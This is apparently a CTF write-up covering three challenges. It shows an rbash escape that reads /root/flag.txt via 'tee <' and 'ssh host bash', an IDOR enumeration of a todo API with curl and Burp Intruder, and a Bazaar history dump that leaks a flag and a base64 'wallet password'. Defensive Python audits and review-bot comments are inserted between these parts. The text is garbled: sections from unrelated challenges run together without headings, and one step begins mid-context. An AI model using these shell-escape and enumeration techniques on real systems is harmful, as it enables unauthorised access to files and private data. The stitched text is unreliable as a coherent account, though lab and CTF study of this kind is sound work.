For this challenge we are in a restricted shell called rbash (for restricted bash) and our goal is to escape or bypass this restriction to get the flag.
For those who are unfamiliar with rbash, here is what it is:
It limits what a user can do and only allows a subset of system commands. Typically, some or all of the following restrictions are imposed by a restricted shell:
- Using the 'cd' command to change directories.
- Setting or unsetting certain environment variables (e.g. SHELL, PATH).
- Specifying command names that contain slashes.
- Specifying a filename containing a slash as an argument to the '.' built-in command.
- Specifying a filename containing a slash as an argument to the '-p' option of the 'hash' built-in command.
- Importing function definitions from the shell environment at startup.
- Parsing the value of SHELLOPTS from the shell environment at startup.
- Redirecting output using the '>', '>|', '<>', '>&', '&>', and '>>' redirection operators.
- Using the 'exec' built-in to replace the shell with another command.
- Adding or deleting built-in commands with the '-f' and '-d' options of the 'enable' built-in.
- Using the 'enable' built-in command to enable disabled shell built-ins.
- Specifying the '-p' option to the 'command' built-in.
- Turning off restricted mode with 'set +r' or 'set +o restricted'.
```
ctf@cb693b5f1ec5:~$ source .bashrc
-rbash: dircolors: command not found
-rbash: /bin/bash: restricted: cannot specify `/' in command names
```
We can't either.
By pressing <TAB> twice we can list the commands available in our environment:
```
ctf@cb693b5f1ec5:~$ <TAB><TAB>
!   [[  bg  caller  compgen  coproc  do  elif  eval  false  fi  grep  if  l   local   popd    read      select    source   then  true   umask    wait   ./
]]  bind  case  complete  declare  done  else  exec  fc  for  hash  in  la  logout  printf  readarray  set  suspend  time  type  unalias  while
:   alert  break  cd  compopt  dirs  echo  enable  exit  fg  function  help  jobs  let  ls  pushd  readonly  shift  tee  times  typeset  unset  {
[   alias  builtin  command  continue  disown  egrep  esac  export  fgrep  getopts  history  kill  ll  mapfile  pwd  return  shopt  test  trap  ulimit  until  }
```
Note that exec, for example, is listed but disallowed.
```
ctf@29a879d73211:~$ tee < .profile
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022

# if running bash
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
        . "$HOME/.bashrc"
    fi
fi

# set PATH so it includes user's private bin directories
```
This works! Noice! We have replaced cat with tee < <file>, and we can now read any file.
There is nothing interesting in .bashrc.
So now we can easily find where the flag is and print it:
```
ctf@1f7bcf5d48c3:~$ echo /root/*
/root/flag.txt
ctf@1f7bcf5d48c3:~$ tee < /root/flag.txt
MCA{ieHaisoh4eif2ae}
```
For those who did the Restricted shells challenge on root-me, you probably know there are a lot of commands that allow you to invoke a shell and execute commands.
A trivial way is to specify a command to execute after the ssh connection command:
```
% ssh ctf@138.247.13.108 id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
```
So we only have to invoke bash, for example:
```
% ssh ctf@138.247.13.108 bash
```
We are now out of rbash. Let's see where the flag can be:
```
ls -lhA /root
total 12K
-rw-r--r-- 1 root root 3.1K Oct 22  2015 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rw-r--r-- 1 root root   21 Feb 19 16:32 flag.txt
```
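As an added, defender-side example (my own code, not part of the writeup), here is a Python audit of an rbash deployment that covers both the restriction list above and the `ssh host <command>` bypass: it checks that the startup files and PATH directories are not writable by the restricted user, that no shell interpreter is reachable through PATH, and that sshd applies a ForceCommand. The fixture layout, the interpreter list and the `audit_rbash_user` name are assumptions.

```python
import os
import stat
import tempfile

# Interpreters whose presence in a restricted PATH voids the restriction
# (constructed, deliberately short list for this demo).
SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}


def is_user_writable(path: str, uid: int) -> bool:
    """Owned by the restricted user (who can chmod it) or group/world writable."""
    st = os.lstat(path)
    return st.st_uid == uid or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_rbash_user(home: str, path_dirs: list, uid: int, sshd_config: str) -> list:
    """Return a list of findings; an empty list means every check passed."""
    findings = []
    # 1. Startup files run before rbash applies its restrictions, so the user
    #    must not be able to edit them (the .bashrc/.profile read above).
    for name in (".bashrc", ".profile", ".bash_profile"):
        p = os.path.join(home, name)
        if os.path.lexists(p) and is_user_writable(p, uid):
            findings.append(f"{name} is writable by the restricted user")
    # 2. PATH must point at read-only directories that contain no shell.
    for d in path_dirs:
        if not os.path.isdir(d):
            findings.append(f"PATH dir {d} does not exist")
            continue
        if is_user_writable(d, uid):
            findings.append(f"PATH dir {d} is writable by the restricted user")
        for cmd in sorted(set(os.listdir(d)) & SHELLS):
            findings.append(f"shell interpreter {cmd} reachable in {d}")
    # 3. `ssh host <cmd>` skips the interactive shell; a ForceCommand in
    #    sshd_config (coarse substring check here) closes that path.
    if "ForceCommand" not in sshd_config:
        findings.append("sshd_config has no ForceCommand for the restricted user")
    return findings


def demo_audit() -> list:
    """Constructed fixture: home and PATH dir owned by the current user."""
    root = tempfile.mkdtemp()
    home = os.path.join(root, "home")
    rbin = os.path.join(root, "rbin")
    os.mkdir(home)
    os.mkdir(rbin)
    open(os.path.join(home, ".bashrc"), "w").close()
    open(os.path.join(rbin, "bash"), "w").close()
    return audit_rbash_user(home, [rbin], os.getuid(), "PermitRootLogin no\n")
```

Running `demo_audit()` on the fixture reports all four weaknesses; a correctly locked-down user yields an empty list.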
There we can press CTRL + U to display the source code, as always.
We can see there are two custom JavaScript scripts included:
lists.js is the one that interests us; at the end of the script we can read:
```javascript
// send put request using the data of the get for the same id
var todoURL = '/api/todos/' + todoID + '/';
$.getJSON(todoURL, function(data) {
  data.is_finished = isFinished;
  if (isFinished) {
    data.finished_at = moment().toISOString();
  } else {
    data.finished_at = null;
  }
  $.ajax({
    url: todoURL,
    type: 'PUT',
    contentType: 'application/json',
    data: JSON.stringify(data),
    success: function() {
      location.reload();
    }
  });
}); // end of the getJSON callback
```
We can access the private data, including the description of every todo, like this:
```
% curl http://138.247.13.110/api/todos/42/
{"id":42,"todolist":42,"description":"The important things are children, honesty, integrity and faith.","created_at":null,"is_finished":false,"finished_at":null}
```
So I used the Intruder of Burp Suite to request http://138.247.13.110/api/todos/<id>/ for <id> from 1 to 1000 and match any content containing MCA{:
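As an added example (my own code, not part of the writeup), here is detection logic for the enumeration pattern just described, run over constructed access-log lines: a client that walks a near-contiguous run of /api/todos/<id>/ resources, with 404s for the ids that do not exist, is flagged, while a user touching only their own todo is not. The log format, client addresses and thresholds are assumptions.

```python
import re
from collections import defaultdict

# Constructed nginx-style access log (sample data, not from the challenge host).
SAMPLE_LOG = """\
10.0.0.5 - - [19/Feb/2019:16:40:01 +0000] "GET /api/todos/41/ HTTP/1.1" 200 151
10.0.0.5 - - [19/Feb/2019:16:40:01 +0000] "GET /api/todos/42/ HTTP/1.1" 200 178
10.0.0.5 - - [19/Feb/2019:16:40:02 +0000] "GET /api/todos/43/ HTTP/1.1" 404 23
10.0.0.5 - - [19/Feb/2019:16:40:02 +0000] "GET /api/todos/44/ HTTP/1.1" 200 160
10.0.0.5 - - [19/Feb/2019:16:40:02 +0000] "GET /api/todos/45/ HTTP/1.1" 200 149
10.0.0.5 - - [19/Feb/2019:16:40:03 +0000] "GET /api/todos/46/ HTTP/1.1" 404 23
10.0.0.9 - - [19/Feb/2019:16:40:05 +0000] "GET /api/todos/7/ HTTP/1.1" 200 140
10.0.0.9 - - [19/Feb/2019:16:41:09 +0000] "PUT /api/todos/7/ HTTP/1.1" 200 140
"""

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) /api/todos/(\d+)/ HTTP/[\d.]+" (\d{3})'
)


def detect_enumeration(log: str, min_ids: int = 5, min_density: float = 0.8) -> dict:
    """Flag clients that walk a near-contiguous run of todo ids.

    density = distinct ids / (max id - min id + 1): a scripted 1..N sweep
    scores 1.0, while a user touching their own todos stays sparse.
    404s are counted because a sweep also hits ids that do not exist.
    """
    ids_by_client = defaultdict(set)
    not_found = defaultdict(int)
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, tid, status = m.groups()
        ids_by_client[ip].add(int(tid))
        if status == "404":
            not_found[ip] += 1
    alerts = {}
    for ip, ids in ids_by_client.items():
        if len(ids) < min_ids:
            continue
        span = max(ids) - min(ids) + 1
        density = len(ids) / span
        if density >= min_density:
            alerts[ip] = {"distinct_ids": len(ids), "span": span,
                          "not_found": not_found[ip], "density": density}
    return alerts
```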
% bzr log -p index.php ------------------------------------------------------------ revno: 167 committer: BZR Lover branch nick: filePathTraversalHard timestamp: Thu 2018-12-06 18:00:21 -0500 message: Oops diff: === modified file 'index.php' --- index.php 2018-12-06 23:00:02 +0000 +++ index.php 2018-12-06 23:00:21 +0000 @@ -28,5 +28,4 @@ ?> </div> </body> -</html> -<!-- 6fb3b5b05966fb06518ce6706ec933e79cfaea8f12b4485cba56321c7a62a077 --> \ No newline at end of file +</html> \ No newline at end of file ------------------------------------------------------------ revno: 166 committer: BZR Lover branch nick: filePathTraversalHard timestamp: Thu 2018-12-06 18:00:02 -0500 message: CentOS is just RedHat diff: === modified file 'index.php' --- index.php 2018-12-06 22:54:52 +0000 +++ index.php 2018-12-06 23:00:02 +0000 @@ -10,6 +10,8 @@ <h1 class="display-4">My Blog</h1> <p class="lead">Just a spot for me to talk about how much I love Canonical</p> </div> + <h1>CentOS is just RedHat</h1> + <p>A friend of mine was explaining how the company he works for pays for RedHat. I don't understand why they are LITERALLY throwing their money away since CentOS is just RedHat. In fact, CentOS is even better than RedHat since it discovers the fastest mirror automatically. I'm applying for one of their open job reqs just to give them a piece of my mind.</p> <h1>I love Canonical</h1> <p>As someone who is just getting started with Linux, I love Canonical. They build the easiest to use Linux distribution I can find, and they build so many useful tools. So far I've tried out</p> <ul> 
@@ -26,4 +28,5 @@ ?> </div> </body> -</html> \ No newline at end of file +</html> +<!-- 6fb3b5b05966fb06518ce6706ec933e79cfaea8f12b4485cba56321c7a62a077 --> \ No newline at end of file ------------------------------------------------------------ revno: 156 committer: BZR Lover branch nick: filePathTraversalHard timestamp: Thu 2018-12-06 17:54:52 -0500 message: Nevermind on the blog post diff: === modified file 'index.php' --- index.php 2018-12-06 22:52:42 +0000 +++ index.php 2018-12-06 22:54:52 +0000 @@ -10,11 +10,6 @@ <h1 class="display-4">My Blog</h1> <p class="lead">Just a spot for me to talk about how much I love Canonical</p> </div> - <h1>Encryption is so cool!</h1> - <p>It's so cool that I can paste a block of text here and if its encrypted then none of you will EVER be able to read it! After reading about it, I'm so comfortable with it that I'm willing to paste my Bitcoin Wallet password right here:</p> - <p>NWEyYTk5ZDNiYWEwN2JmYmQwOGI5NjEyMDVkY2FlODg3ZmIwYWNmOWYyNzI5MjliYWE3OTExZmFhNGFlNzc1MQ==</p> - <p>There's like a whole 3 Bitcoin in there, but none of you will ever be able to get it!</p> - <hr> <h1>I love Canonical</h1> <p>As someone who is just getting started with Linux, I love Canonical. They build the easiest to use Linux distribution I can find, and they build so many useful tools. So far I've tried out</p> <ul> ------------------------------------------------------------ revno: 155 committer: BZR Lover branch nick: filePathTraversalHard timestamp: Thu 2018-12-06 17:52:42 -0500 message: Add a new blog post! diff: === modified file 'index.php' --- index.php 2018-12-06 18:48:25 +0000 +++ index.php 2018-12-06 22:52:42 +0000 
@@ -10,6 +10,11 @@ <h1 class="display-4">My Blog</h1> <p class="lead">Just a spot for me to talk about how much I love Canonical</p> </div> + <h1>Encryption is so cool!</h1> + <p>It's so cool that I can paste a block of text here and if its encrypted then none of you will EVER be able to read it! After reading about it, I'm so comfortable with it that I'm willing to paste my Bitcoin Wallet password right here:</p> + <p>NWEyYTk5ZDNiYWEwN2JmYmQwOGI5NjEyMDVkY2FlODg3ZmIwYWNmOWYyNzI5MjliYWE3OTExZmFhNGFlNzc1MQ==</p> + <p>There's like a whole 3 Bitcoin in there, but none of you will ever be able to get it!</p> + <hr> <h1>I love Canonical</h1> <p>As someone who is just getting started with Linux, I love Canonical. They build the easiest to use Linux distribution I can find, and they build so many useful tools. So far I've tried out</p> <ul> ------------------------------------------------------------ revno: 1 committer: BZR Lover branch nick: filePathTraversalEasy timestamp: Thu 2018-12-06 13:48:25 -0500 message: BZR is so cool! diff: === added file 'index.php' --- index.php 1970-01-01 00:00:00 +0000 +++ index.php 2018-12-06 18:48:25 +0000 
@@ -0,0 +1,29 @@ +<html> + <head> + <title>My Blog</title> + <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous"> + </head> + <body> + + <div class="container"> + <div class="jumbotron"> + <h1 class="display-4">My Blog</h1> + <p class="lead">Just a spot for me to talk about how much I love Canonical</p> + </div> + <h1>I love Canonical</h1> + <p>As someone who is just getting started with Linux, I love Canonical. They build the easiest to use Linux distribution I can find, and they build so many useful tools. So far I've tried out</p> + <ul> + <li>Juju - The worlds best configuration management tool!</li> + <li>Bazaar - The worlds best version control!</li> + <li>Ubuntu - The worlds best OS!</li> + <li>Launchpad - GitHub? Gross!</li> + </ul> + <hr> + <h1>Learning PHP</h1> + <p>I recently learned about PHP and I can't stop switching everything over to it. In fact, this blog is now powered by PHP, I think! I changed the file extension at least, and added a little PHP code below here. That should pretty much do it right? I have the PHP code commented out for now since I can't seem to get it to work right. I'll have to look into it later.</p> + <?php + // Flag is MCA{canonical_is_literally_my_favorite_company_in_the_whole_world} + ?> + </div> + </body> +</html> \ No newline at end of file
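Review bot: the `<?php // Flag is MCA{...} ?>` lines in the revno 1 hunk commit a secret into index.php; a PHP comment is only hidden while PHP actually executes the file, and once the value is in revno 1 every later revision carries it in branch history, which is exactly what `bzr log -p` prints here. Keep secrets out of tracked files entirely and recreate the branch history after such a commit instead of deleting the line later.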
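Review bot: the revno 156 hunk ("Nevermind on the blog post") only reverts what revno 155 added, so the wallet-password paragraph is still readable in the revno 155 hunk; a later removal does not retract it. The post also calls the value encrypted, but a string ending in `==` looks like base64, which is an encoding anyone can reverse, so this should be treated as a credential exposure and the credential rotated rather than relying on the revert.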
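Review bot: same pattern in the revno 166 / 167 pair: the `@@ -26,4 +28,5 @@` hunk of revno 166 appends a 64-hex-character HTML comment after `</html>`, and revno 167 ("Oops") removes it again, leaving it in history. A pre-commit check that rejects long hex strings and HTML comments in templates would have caught both this and the revno 155 paste before they were recorded.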